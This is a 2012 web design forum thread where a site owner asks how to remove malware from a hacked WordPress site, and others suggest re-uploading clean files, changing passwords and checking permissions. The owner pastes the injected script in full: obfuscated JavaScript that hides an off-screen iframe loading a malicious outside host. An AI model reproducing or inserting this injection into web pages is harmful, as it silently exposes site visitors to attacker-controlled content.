Member Offer
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Major help!!!!

Discussion in 'Website Design Forum:' started by NUGFX, Oct 26, 2012.

  1. NUGFX

    NUGFX Member

    my website has been attacked and hit with malware, is there anyway you can remove this without a fresh install of my site?

    please let there be a way, been looking at everything. i know what the malware is but i cant remove it.

    <script type="text/javascript" language="javascript" > var _f = document.createElement('iframe'),_r = 'setAttribute';_f[_r]('src', 'http://srlqpdbd.pro/in.cgi?2');_f.style.position = 'absolute';_f.style.width = '10px';_f[_r]('frameborder', navigator.userAgent.indexOf('bf3f1f8686832c30d7c764265f8e7ce8') + 1);_f.style.left = '-5540px';document.write('<div id=\'MIX_ADS\'></div>');document.getElementById('MIX_ADS').appendChild(_f);</script>
     
  2. Corrosive

    Corrosive Moderator Staff Member

    Can't you just delete the offending link/script?
     
  3. Where is it? If it's in one of the wordpress files you can easily just reupload that file? If it's in a plugin file disable that plugin
     
  4. NUGFX

    NUGFX Member

    i cant actually find the script on my files only when i view the source on the page (line 91)
     
  5. Katedesign

    Katedesign Well-Known Member

    I have heard from a friendly 'geek' that is can be one of the problems with Wordpress... WP is hackable! Sorry... what about your hosting co?
     
    NUGFX likes this.
  6. DigitalYak

    DigitalYak Member

    Hi Nugfx, theres a really easy fix to your problem in the short term, jusr re-upload your local copy from your own computer (obviously check that copy for the virus first ) this will override the hosted version on the server and remove the offending virus. In the long run though i would heed Katedesign, Wordpress may seem freindly and easy to use but it's securty is terrible, espicialy if you use templates and plugins. It might seem like a pain in the behind to use something else but it will stop issues like this in the future. also check with your hosting company as they should have an anti visur system that would pick this one up, i would change them asap. Best of luck.

    Matt.
     
    NUGFX and Corrosive like this.
  7. Corrosive

    Corrosive Moderator Staff Member

    One of the main issues with Wordpress (and other CMS) is that people don't usually carry out even the basic security stuff. I see references to wp-content folders in source code all the time and that makes it easily figerprinted. Before long you're on the speed-dial of every hacker-bot out there.

    Hmmm there are some familiar looking 'wp' links... I wonder what happens if I type in www.linktosite.co.uk/wp-admin?.. Oh look, there is a lovely WP login screen... Let the brute force attack begin! Not dealing with that sort of thing is just asking to get hacked. I know securing a site is a ball ache and makes updating that much harder but it just has to be done.
     
    NUGFX likes this.
  8. spottypenguin

    spottypenguin Active Member

  9. NUGFX

    NUGFX Member

    thx alot 4 ur responses, unfortunately i cudnt remove the script and in the end had to restart my site, im well guttered :(

    ill look at bulletproof spotty. but now i just gotta wait 4 google to rescan and verify my site :(
     
  10. Edge

    Edge Active Member

    One of the *major* offenders is a permissions setting of 777 which opens up your folders to anyone else on the same server. I'd double check your permissions on directories and which users/user groups have access.
     
    NUGFX and Corrosive like this.
  11. NUGFX

    NUGFX Member

    all my permissions were set right and i was the only admin able 2 use ftp on my server. anyway ive secured my site upto the eyeballs now haha now is the process of re writing all my content again :(
     
  12. richimgd

    richimgd Member

    One of the wordpress sites I made for a mate had a similar attack. It was called an iframe injection attach where basically every single php file on the server was edited to contain an iframe to a nasty website. I think this was down to the ftp password being compromised - so it was just a case of uploading the local non-infected site and changing the passwords.

    Wordpress does have all kinds of security options and plugins. You just need to be careful out there!

    Shame you couldn't salvage your website and not have to start again...
     
  13. NUGFX

    NUGFX Member

    finally got my website back up and running with no problems :D happy days :)
     

Share This Page